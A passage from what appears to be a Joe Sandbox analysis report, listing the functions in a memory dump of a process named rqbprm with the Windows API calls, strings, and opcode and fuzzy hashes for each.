                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: fc0136a6d928e5b14385698ca10ae6351b0d92234f53533cf4c15626a416c4e1
                                                                                              • Instruction ID: 045121a7a56836dac3fcbb0ac14dfeb659dda09e637b7068a848da2a21483c0b
                                                                                              • Opcode Fuzzy Hash: fc0136a6d928e5b14385698ca10ae6351b0d92234f53533cf4c15626a416c4e1
                                                                                              • Instruction Fuzzy Hash: D5A011C32A8002BC3208220A2E0AC3B022CC0CAFA8330C8AEF82A800C0A8800C002832
                                                                                              Function 00C7E569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E51F
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5de1b3298815a6a7d14f0e11f865600e99cb8865ab4272edea467d653a4fb027
                                                                                              • Instruction ID: 045121a7a56836dac3fcbb0ac14dfeb659dda09e637b7068a848da2a21483c0b
                                                                                              • Opcode Fuzzy Hash: 5de1b3298815a6a7d14f0e11f865600e99cb8865ab4272edea467d653a4fb027
                                                                                              • Instruction Fuzzy Hash: D5A011C32A8002BC3208220A2E0AC3B022CC0CAFA8330C8AEF82A800C0A8800C002832
                                                                                              Function 00C7E573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E580
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: b2e295e0e301c2246a40231e903fcb10857076a2147557a6b92f53ca84156637
                                                                                              • Instruction ID: 108662e6467020d9af87aee12c66db5b6581d8ee97618cdbcf30763f7683cc75
                                                                                              • Opcode Fuzzy Hash: b2e295e0e301c2246a40231e903fcb10857076a2147557a6b92f53ca84156637
                                                                                              • Instruction Fuzzy Hash: 44A011C32A80003C3208A2B22C8AC3B022CC0C8B2A330C2AEF828880C0A88008002832
                                                                                              Function 00C69F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetEndOfFile.KERNELBASE(?,00C6903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00C69F0C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: File
                                                                                              • String ID:
                                                                                              • API String ID: 749574446-0
                                                                                              • Opcode ID: 1c7a54002356647a1e01761dc3e88372c7ed9d11dac872c488baf8e283493b4b
                                                                                              • Instruction ID: 1a51e794a1b4e11d14c7356700811a92e6014c15f2526d75f5c3e4bc2bbef015
                                                                                              • Opcode Fuzzy Hash: 1c7a54002356647a1e01761dc3e88372c7ed9d11dac872c488baf8e283493b4b
                                                                                              • Instruction Fuzzy Hash: 91A0113008000A8A8E002B32CA0820C3B20EB22BC030022A8A00ACA0A2CB22882B8A20
                                                                                              Function 00C7AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,00C7AE72,C:\Users\user\Desktop,00000000,00CA946A,00000006), ref: 00C7AC08
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory
                                                                                              • String ID:
                                                                                              • API String ID: 1611563598-0
                                                                                              • Opcode ID: e1437e9e5e7e80a3f1a55e4363811962d5d98aa410d7c8376397bc1587e4805f
                                                                                              • Instruction ID: c01a2527fb2cca284233590411a87584126855c195443a858cd95a80e6c12d7d
                                                                                              • Opcode Fuzzy Hash: e1437e9e5e7e80a3f1a55e4363811962d5d98aa410d7c8376397bc1587e4805f
                                                                                              • Instruction Fuzzy Hash: 8BA011302002808B82000B328F0AB0EBAAAAFA2B00F00C02AA00088030CB30C820AA00
                                                                                              Function 00C69620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CloseHandle.KERNELBASE(000000FF,?,?,00C695D6,?,?,?,?,?,00C92641,000000FF), ref: 00C6963B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2962429428-0
                                                                                              • Opcode ID: 4b90cb8c8f48d7fee32ad8c165e3367af0f0ac8b2e8e0385148509ec4f7faff0
                                                                                              • Instruction ID: 56cefb82ad5f2d13370afc978380dd49d280ceee42265cdf161f98eaae09bb35
                                                                                              • Opcode Fuzzy Hash: 4b90cb8c8f48d7fee32ad8c165e3367af0f0ac8b2e8e0385148509ec4f7faff0
                                                                                              • Instruction Fuzzy Hash: A5F05E70481B559FDB308A64C498B92B7ECEF12335F045B1EE4F6429E0D771AA8D9A40

                                                                                              Non-executed Functions

                                                                                              Function 00C7C220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00C61316: GetDlgItem.USER32(00000000,00003021), ref: 00C6135A
                                                                                                • Part of subcall function 00C61316: SetWindowTextW.USER32(00000000,00C935F4), ref: 00C61370
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00C7C2B1
                                                                                              • EndDialog.USER32(?,00000006), ref: 00C7C2C4
                                                                                              • GetDlgItem.USER32(?,0000006C), ref: 00C7C2E0
                                                                                              • SetFocus.USER32(00000000), ref: 00C7C2E7
                                                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 00C7C321
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00C7C358
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00C7C36E
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C7C38C
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C7C39C
                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00C7C3B8
                                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00C7C3D4
                                                                                              • _swprintf.LIBCMT ref: 00C7C404
                                                                                                • Part of subcall function 00C64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C640A5
                                                                                              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00C7C417
                                                                                              • FindClose.KERNEL32(00000000), ref: 00C7C41E
                                                                                              • _swprintf.LIBCMT ref: 00C7C477
                                                                                              • SetDlgItemTextW.USER32(?,00000068,?), ref: 00C7C48A
                                                                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00C7C4A7
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00C7C4C7
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C7C4D7
                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00C7C4F1
                                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00C7C509
                                                                                              • _swprintf.LIBCMT ref: 00C7C535
                                                                                              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00C7C548
                                                                                              • _swprintf.LIBCMT ref: 00C7C59C
                                                                                              • SetDlgItemTextW.USER32(?,00000069,?), ref: 00C7C5AF
                                                                                                • Part of subcall function 00C7AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00C7AF35
                                                                                                • Part of subcall function 00C7AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00C9E72C,?,?), ref: 00C7AF84
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                              • API String ID: 797121971-1840816070
                                                                                              • Opcode ID: c01b6674a43f654028c565e59a568f842fdc34218be2c86b7968e50113af7eee
                                                                                              • Instruction ID: d202fb3bf164abfba724189801d1268b42fc509aede4a28cab56fe65882d3b9e
                                                                                              • Opcode Fuzzy Hash: c01b6674a43f654028c565e59a568f842fdc34218be2c86b7968e50113af7eee
                                                                                              • Instruction Fuzzy Hash: 8E918272248389BFD3219BA0DC89FFF77ACEB49B00F048819F649D6091D775EA049762
                                                                                              Function 00C66FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00C66FAA
                                                                                              • _wcslen.LIBCMT ref: 00C67013
                                                                                              • _wcslen.LIBCMT ref: 00C67084
                                                                                                • Part of subcall function 00C67A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00C67AAB
                                                                                                • Part of subcall function 00C67A9C: GetLastError.KERNEL32 ref: 00C67AF1
                                                                                                • Part of subcall function 00C67A9C: CloseHandle.KERNEL32(?), ref: 00C67B00
                                                                                                • Part of subcall function 00C6A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00C6977F,?,?,00C695CF,?,?,?,?,?,00C92641,000000FF), ref: 00C6A1F1
                                                                                                • Part of subcall function 00C6A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00C6977F,?,?,00C695CF,?,?,?,?,?,00C92641), ref: 00C6A21F
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00C67139
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00C67155
                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00C67298
                                                                                                • Part of subcall function 00C69DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00C673BC,?,?,?,00000000), ref: 00C69DBC
                                                                                                • Part of subcall function 00C69DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00C69E70
                                                                                                • Part of subcall function 00C69620: CloseHandle.KERNELBASE(000000FF,?,?,00C695D6,?,?,?,?,?,00C92641,000000FF), ref: 00C6963B
                                                                                                • Part of subcall function 00C6A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00C6A325,?,?,?,00C6A175,?,00000001,00000000,?,?), ref: 00C6A501
                                                                                                • Part of subcall function 00C6A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00C6A325,?,?,?,00C6A175,?,00000001,00000000,?,?), ref: 00C6A532
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                              • API String ID: 3983180755-3508440684
                                                                                              • Opcode ID: 6d74e5ca7454a9d337d1f0c25486f00b144500c05004a2aa9bfd132ce1fa7550
                                                                                              • Instruction ID: fc8ac461c06c0fc13ff33b28a13929cf1394c3c75da10453d5885fc3cf20053b
                                                                                              • Opcode Fuzzy Hash: 6d74e5ca7454a9d337d1f0c25486f00b144500c05004a2aa9bfd132ce1fa7550
                                                                                              • Instruction Fuzzy Hash: 2EC1F971904644AADB31DB74CCC5FEEB3ACAF04308F044A5AF95AE7282D734AB44DB65
                                                                                              Function 00C7F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C7F844
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00C7F910
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C7F930
                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00C7F93A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 254469556-0
                                                                                              • Opcode ID: ecf6325ad47a8273381bdebf80da703ce245945ed1c3576d2452040e24dfa99c
                                                                                              • Instruction ID: ea37bbc06fac6e0867a3c35c80a8b12ec9ff6fc2fbc6d29f53953bd9512a2dda
                                                                                              • Opcode Fuzzy Hash: ecf6325ad47a8273381bdebf80da703ce245945ed1c3576d2452040e24dfa99c
                                                                                              • Instruction Fuzzy Hash: F9312975D05219DBDB21DFA4D9897CDBBF8AF08304F1080AAE50CAB290EB719B859F45
                                                                                              Function 00C7E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VirtualQuery.KERNEL32(80000000,00C7E5E8,0000001C,00C7E7DD,00000000,?,?,?,?,?,?,?,00C7E5E8,00000004,00CC1CEC,00C7E86D), ref: 00C7E6B4
                                                                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00C7E5E8,00000004,00CC1CEC,00C7E86D), ref: 00C7E6CF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoQuerySystemVirtual
                                                                                              • String ID: D
                                                                                              • API String ID: 401686933-2746444292
                                                                                              • Opcode ID: 5f9411ce0f341d0277a44c731dd9a038e113d9c11e1c18aac6a3afe3498731a1
                                                                                              • Instruction ID: e5063138db3a2787cbf4acaaa5d0a43b7b01d6d00c9c196f46162d1d975edec2
                                                                                              • Opcode Fuzzy Hash: 5f9411ce0f341d0277a44c731dd9a038e113d9c11e1c18aac6a3afe3498731a1
                                                                                              • Instruction Fuzzy Hash: 2401A7736001096BDB14DE29DC49BDD7BAAAFC8328F0CC165ED6DD7164D734DA058690
                                                                                              Function 00C88EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00C88FB5
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00C88FBF
                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00C88FCC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                              • String ID:
                                                                                              • API String ID: 3906539128-0
                                                                                              • Opcode ID: e7ab1f4c28ce566182bfea6e7b2bcebb3ec55340aaf1b44593edc159e91fb0e0
                                                                                              • Instruction ID: 5f1ebbbd30731803b6cf1590a4411687ee2a83839e759386fd2521fef63c41fb
                                                                                              • Opcode Fuzzy Hash: e7ab1f4c28ce566182bfea6e7b2bcebb3ec55340aaf1b44593edc159e91fb0e0
                                                                                              • Instruction Fuzzy Hash: B031D67590122CABCB21DF68DC89B9DBBB8BF08310F5041EAE41CA7250EB709F858F54
                                                                                              Function 00C8B348 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: .
                                                                                              • API String ID: 0-248832578
                                                                                              • Opcode ID: eadc2dafb0cea6e4c31d9077ed8f7ee4cba64e3ee618724163f370e2be1bfb61
                                                                                              • Instruction ID: 42130e66d8e142a58cef419672cdd6bf0374b7666e4c524589558b45206b8fff
                                                                                              • Opcode Fuzzy Hash: eadc2dafb0cea6e4c31d9077ed8f7ee4cba64e3ee618724163f370e2be1bfb61
                                                                                              • Instruction Fuzzy Hash: 5B31E771900249AFCB24AE78CC85EFF7BBDDB85318F1441A8F929D7252EB309E458B54
                                                                                              Function 00C7AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00C7AF35
                                                                                              • GetNumberFormatW.KERNEL32(00000400,00000000,?,00C9E72C,?,?), ref: 00C7AF84
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
